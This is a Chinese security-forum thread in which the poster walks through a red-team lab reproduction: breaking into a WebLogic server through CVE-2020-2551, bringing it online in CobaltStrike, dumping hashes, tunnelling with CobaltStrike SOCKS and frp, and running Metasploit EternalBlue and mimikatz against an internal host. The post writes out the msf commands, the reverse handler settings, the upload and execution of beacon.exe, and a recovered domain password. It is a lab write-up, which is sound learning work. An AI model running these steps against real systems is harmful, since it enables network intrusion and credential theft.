安全矩阵

 找回密码
 立即注册
搜索
查看: 2968|回复: 3

从外网 Weblogic 打进内网,再到约束委派接管域控(复现)

[复制链接]

63

主题

125

帖子

457

积分

中级会员

Rank: 3Rank: 3

积分
457
发表于 2021-11-13 21:26:36 | 显示全部楼层 |阅读模式
从外网 Weblogic 打进内网,再到约束委派接管域控(复现)
靶场官方:渗透攻击红队(微信公众号)
0x01 靶场配置
攻击机1:win10 192.168.0.193
攻击机2:kali 192.168.0.105
靶机: 192.168.0.154 weblogic服务器,其他在域内
测试:
xray扫一下weblogic 有CVE_2020_2551
直接一把梭,有admin账户且出网



query process查看当前进程


可以看到是无AV的,都不需要做免杀
直接Powershell 上线到 CobaltStrike:
cs-attack-payload Generator -powshell command生成命令shell
放入利用工具里执行
好奇怪 我本机都可以上线,但是发现weblogic服务器就是上不了线,开http上传beacon.exe并运行也不能上线
后来发现ping不了我的kali(cs服务器),原来设置到第一层网络去了
得把kali的桥接模式设成物理机
ok 成功上线

看到改机器有两个网卡
hashdump下来

既然有第二个网卡,进行域内信息手机
凸(艹皿艹 ),扫半天没扫出来,才发现我pc靶机没打开(用巨龙拉冬9.0多口探测)

扫到了这个
巨龙拉冬扫一下龙洞

ms17-010
端口转发>cs派生给msf
利用cs自带开个SOCKS端口

然后msf连接
setg Proxies socks4:192.168.0.105:7000

attack
msf6 > setg ReverseAllowProxy true

msf6 > use exploit/windows/smb/ms17_010_eternalblue

msf6 > set payload windows/x64/meterpreter/bind_tcp

msf6 > set rhost 10.10.20.7

msf6 > run
打不进去,是因为cs自带的socks的不稳定性
直接用cs创建msf监听器试一下,然后msf打开监听即可
use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhoat 192.168.0.105

set lport 1234


这里又产生了个误区,这样的派生结果还是进入了10.10.20.12的meterpreter,好家伙之前学的那些ew啥的考自己搭的环境去学都没能真正学到知识,还得是实战配合工具才能学到知识
用frp建立一个 socks5 隧道试试
kali配置文件 frps.ini,然后运行:


之后来到目标跳板机器运行 frpc:
当然是先上个shell上传frp文件
放temp文件夹是因为一般都是temp文件夹的权限比较高,当然我们现在是administrator
当然这里我用的是cs的frp插件
这个插件用起来看不懂咋用,应该是将frpc.ini传到指定文件夹,下面这个框写下这个目录就行

不过我直接将这个插件里面文件夹的exe直接传过去配合之前传的frpc.ini然后
shell frpc.exe -c frpc.ini



省的麻烦
建立好 socks5 隧道后 Metasploit 对其利用拿到 Meterpreter 会话:
msf6 > setg Proxies socks5:192.168.0.105:7777
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set payload windows/x64/meterpreter/bind_tcp
msf6 > set rhost 10.10.20.7
msf6 > run

ok


通过调用 mimikatz 成功抓到其域用户的密码
load mimikatz
creds_all


解一下hash
Username  Domain   Password
saul      REDTEAM  admin!@#45
中转上线到 CobaltStrike 进行二层内网域渗透 有几种方法
1.meterpreter配置端口外带到cs,方法地址如下
2.设置中转(反向代理)
因为此 Win7 不出网,随后只能通过 CobaltStrike 设置中转:
这里换了kali:192.168.0.124
操作:






然后用这个监听器生成一个exe程序,然后用meterpreter的upload上传到10.10.20.7
然后在用meterpreter调用cmd运行它
upload /var/tmp/FrpProPlugin-mainfrp0.33可转发至cs/beacon.exe C:\\windows\\system32\

execute -f C:\\windows\\system32\beacon.exe
或cs创建powershell.ps
直接merterpreter执行cmd执行powershell
execute怎么样都上不了线,本地把载荷也传过去,也上不了线
方法3.将cs载荷带进内网
chcp 65001
meterpreter先stuid提权在执行命令试试
我记得没错开始之前会输入一条命令。编码格式的

回复

使用道具 举报

63

主题

125

帖子

457

积分

中级会员

Rank: 3Rank: 3

积分
457
 楼主| 发表于 2021-11-13 21:28:41 | 显示全部楼层
值得学习,后面还会继续补充,加上小小rubishh16g笔记本电脑开五个虚拟机导致反复死机多次(要命的是cs和msf同时打开的时候就死机),几经崩溃,后面还会继续补充
回复

使用道具 举报

63

主题

125

帖子

457

积分

中级会员

Rank: 3Rank: 3

积分
457
 楼主| 发表于 2021-11-13 21:29:31 | 显示全部楼层
这里有别的公众号大佬的另类思路 牛
https://mp.weixin.qq.com/s?__biz ... 8a1fcbc183d841c4#rd
回复

使用道具 举报

63

主题

125

帖子

457

积分

中级会员

Rank: 3Rank: 3

积分
457
 楼主| 发表于 2021-11-16 19:58:42 | 显示全部楼层
刚才手贱又打开了,等内存条吧

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 21:36 , Processed in 0.014750 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表